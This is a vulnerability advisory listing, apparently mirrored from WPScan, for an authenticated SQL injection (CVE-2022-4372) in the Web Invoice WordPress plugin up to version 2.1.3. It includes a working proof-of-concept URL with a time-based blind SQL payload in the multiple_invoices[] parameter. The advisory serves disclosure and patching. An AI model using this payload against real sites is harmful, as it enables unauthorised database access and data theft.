Lucene search
Daniel KrohmerWPEX-ID:218F8015-E14B-46A8-889D-08B2B822F8AEHistoryDec 12, 2022 - 12:00 a.m.
Web Invoice <= 2.1.3 - Authenticated SQLi
2022-12-1200:00:00
Daniel Krohmer
59
web invoice
authenticated
sql injection
unauthorized access
vulnerability
0.001 Low
EPSS
Percentile
43.0%
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL Injection exploitable by high privilege users such as admin by default. However, depending on the plugin configuration, other users, such as subscriber could exploit this as well
When logged in with a user allowed to Manage invoice (default admin but can be changed via the plugin's settings), open the following URL
https://example.com/wp-admin/admin.php?page=new_web_invoice&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_logRelated
cvelist
cvelist
CVE-2022-4372 Web Invoice <= 2.1.3 - Authenticated SQLi
2023-01-02 21:49:39
cve
cve
CVE-2022-4372
2023-01-02 22:15:17
prion
prion
Sql injection
2023-01-02 22:15:00
wpvulndb
wpvulndb
Web Invoice <= 2.1.3 - Authenticated SQLi
2022-12-12 00:00:00
nvd
nvd
CVE-2022-4372
2023-01-02 22:15:17